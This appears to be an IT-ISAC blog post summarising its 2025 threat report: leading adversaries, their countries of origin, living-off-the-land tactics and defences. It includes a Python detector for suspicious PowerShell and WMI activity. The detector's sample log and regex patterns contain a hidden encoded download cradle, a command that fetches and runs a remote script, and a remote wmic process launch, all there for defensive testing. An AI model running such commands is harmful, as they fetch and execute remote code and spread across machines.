
Examining the 2025 Cyber Threat Landscape: Insights from the IT-ISAC Threat Report

In an era where digital infrastructure is under constant attack, information sharing has never been more vital. By fostering a collaborative environment for threat intelligence, the IT-ISAC helps organizations move beyond reactive security toward proactive resilience. The IT-ISAC's 2025 IT Sector Cyber Threat Report reveals a dynamic environment of nation-state espionage and organized cybercrime that demands a more sophisticated approach to defense.


Informing the analysis in the report is the IT-ISAC’s Predictive Adversary Scoring System (PASS). Developed in collaboration with member organizations, PASS evaluates over 330 unique adversaries across metrics like recent activity, the frequency of targeting the IT sector, and the sophistication of their tactics, assigning a numerical threat score. This system transforms raw intelligence into actionable information, ensuring that security teams are focused on the actors that pose the most significant risk to their specific sub-sectors.


Top Adversaries Targeting the IT Sector


The IT sector remains a target for high-capability actors. Leading the list of threats are the Lazarus Group and Famous Chollima, both nation-state actors with near-perfect scores in the PASS system due to their focus on the industry. Following closely are sophisticated entities like APT35 and the ransomware-focused Warlock.


These threats are characterized by their patience and diverse motivations. While groups like APT41 and Sandworm maintain high rankings through state-sponsored operations, others like LockBit 5.0 and the Scattered Lapsus$ Hunters represent the growing danger of highly organized, financially motivated cybercrime syndicates. The diversity of these actors underscores that the IT sector must defend against a spectrum of threats that includes both geopolitical disruption and extortion.


A Global Web of Risk


The geographic origin of these threats provides critical context for understanding adversary intent. Russia remains the most significant source of cyber activity, accounting for nearly half of all observed threat actors at 48.4%. This ecosystem is highly varied, ranging from state-affiliated espionage groups to opportunistic ransomware gangs.


China follows as the second most frequent point of origin, representing 29% of actors. A notable shift in Chinese tactics is the move toward long-term persistence: rather than smash-and-grab data theft, these actors are increasingly embedding themselves within telecommunications and cloud environments to maintain a listening post for extended periods.


The landscape is rounded out by actors from Iran, North Korea, and several other nations. While smaller in total volume, their impact is no less significant. North Korean groups, for instance, have become pioneers in fraudulent schemes, including the use of remote IT worker identities to infiltrate companies and generate illicit revenue through cryptocurrency theft. The IT-ISAC CSaaS CISO SIG has written a white paper on this topic and how hiring departments can mitigate it, available to read here.


Current Tactics


Understanding how these groups operate is just as crucial as knowing who they are. The 2025 findings highlight a universal trend: the use of living-off-the-land (LOTL) techniques. Remarkably, 100% of the 77 active adversaries identified this year utilized readily available system tools or native software to carry out their attacks. By using legitimate tools like PowerShell or WMI, attackers can blend in with normal administrative activity, making them much harder to detect than traditional malware.


Furthermore, over 96% of actors modified existing malware to evade signatures, and nearly 85% demonstrated the ability to develop entirely custom tools. Adversaries are now focused on keeping a low profile, prioritizing defense evasion and long-term persistence over immediate disruption.


Building a Resilient Defense


To counter these sophisticated threats, organizations must shift their focus toward behavioral detection and zero-trust principles. A primary line of defense remains the implementation of phishing-resistant multi-factor authentication (MFA). Monitoring for anomalous usage of native system tools is also essential to catching LOTL attacks before they escalate.
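As an added example (not code from the IT-ISAC report or its PASS system), the following Python script shows the kind of behavioral check that the LOTL findings above and this recommendation call for: it scores Windows process-creation events for anomalous PowerShell and WMI usage, and decodes -EncodedCommand payloads before matching so that an encoded download cradle is not missed. The log lines are constructed for the example, and the field names, rule weights and thresholds are assumptions for illustration, not a vendor schema or a published detection rule.

```python
"""Rule-based scorer for living-off-the-land (LOTL) process activity.

Added example, not code from the IT-ISAC report. Event format and field
names (host, user, parent, image, cmdline) are assumptions modelled
loosely on process-creation telemetry; adapt parse_line() to your
EDR/SIEM export. Rule weights and thresholds are illustrative.
"""
import base64
import binascii
import ntpath
import re
from dataclasses import dataclass

# Native tools whose launch from an unusual parent is suspicious.
NATIVE_TOOLS = {"powershell.exe", "pwsh.exe", "wmic.exe", "cmd.exe"}
# Parents that rarely have a legitimate reason to spawn those tools.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                      "outlook.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
EVASION_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-e[a-z]*\s+bypass|-noni(?:nteractive)?")
CRADLE_RE = re.compile(r"(?i)\b(?:IEX|Invoke-Expression|Invoke-WebRequest|IWR|"
                       r"DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)\b")
WMIC_EXEC_RE = re.compile(r"(?i)/node:|process\s+call\s+create")
PS_WMI_EXEC_RE = re.compile(r"(?i)Invoke-(?:Wmi|Cim)Method.*Win32_Process")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

ALERT, REVIEW = 50, 20  # assumed score thresholds


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Parse one key=value log line; quoted values may contain spaces."""
    kv = {k: v.strip('"') for k, v in KV_RE.findall(line)}
    return ProcEvent(kv["host"], kv["user"], kv["parent"], kv["image"], kv["cmdline"])


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def score_event(e: ProcEvent):
    """Return (score, [rule names]) for one process-creation event."""
    image = ntpath.basename(e.image).lower()
    parent = ntpath.basename(e.parent).lower()
    is_ps = image.startswith(("powershell", "pwsh"))
    decoded = decode_encoded_command(e.cmdline)
    text = e.cmdline + "\n" + decoded  # match the decoded payload as well as the raw line
    hits = []
    if image in NATIVE_TOOLS and parent in SUSPICIOUS_PARENTS:
        hits.append(("suspicious_parent", 40))
    if decoded:
        hits.append(("encoded_command", 40))
    if is_ps and CRADLE_RE.search(text):
        hits.append(("download_cradle", 35))
    if is_ps and EVASION_RE.search(e.cmdline):
        hits.append(("evasion_flags", 20))
    if (image == "wmic.exe" and WMIC_EXEC_RE.search(e.cmdline)) or \
       (is_ps and PS_WMI_EXEC_RE.search(text)):
        hits.append(("wmi_process_exec", 50))
    return sum(w for _, w in hits), [n for n, _ in hits]


def verdict(score: int) -> str:
    return "alert" if score >= ALERT else "review" if score >= REVIEW else "info"


def triage(lines):
    """Score every non-empty line; return (host, user, verdict, score, rules) tuples."""
    out = []
    for line in lines:
        if line.strip():
            e = parse_line(line)
            score, rules = score_event(e)
            out.append((e.host, e.user, verdict(score), score, rules))
    return out


# Constructed sample telemetry (not real data). The base64 blob decodes to
# "IEX (New-Object Net.WebClient)", a truncated download cradle.
SAMPLE_LOG = r"""
host=WS-101 user=CORP\svc_admin parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"
host=WS-117 user=CORP\jdoe parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
host=WS-117 user=CORP\jdoe parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\wbem\wmic.exe cmdline="wmic /node:FS-02 process call create 'cmd /c whoami'"
host=WS-104 user=CORP\helpdesk parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\wbem\wmic.exe cmdline="wmic os get caption"
host=WS-122 user=CORP\mlee parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
host=WS-122 user=CORP\mlee parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c Get-Process"
""".strip().splitlines()

if __name__ == "__main__":
    for host, user, v, score, rules in triage(SAMPLE_LOG):
        print(f"{v:6} {score:3} {host} {user} {rules}")
```

Two design points matter more than the specific weights. First, the rules match on the decoded payload as well as the raw command line, because an attacker who uses -EncodedCommand defeats any rule that only inspects the visible arguments. Second, the parent-process check carries weight on its own: a scheduled inventory script launched from explorer.exe by an admin account scores zero, while the same binary launched from Word scores high before its arguments are even considered. In production the allowlist of expected parents and users should come from a baseline of your own environment rather than the fixed sets used here.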


Resilience requires a change in mindset regarding breaches; organizations should assume a state of compromise and engage in continuous threat hunting rather than waiting for an automated alert. This includes segmenting IT and operational technology (OT) environments to prevent lateral movement, and maintaining offline backups. 


Most importantly, no organization should navigate these waters alone. Joining a community like the IT-ISAC acts as a force multiplier, providing access to early warnings and a shared pool of knowledge that makes the entire sector stronger and more prepared for whatever 2026 may bring.


Want to read the full analysis? Check out our public version on our Resources Page. IT-ISAC members can access the extended member report via Notion or by contacting our team at membership@it-isac.org.



© 2026 by Information Technology-Information Sharing and Analysis Center.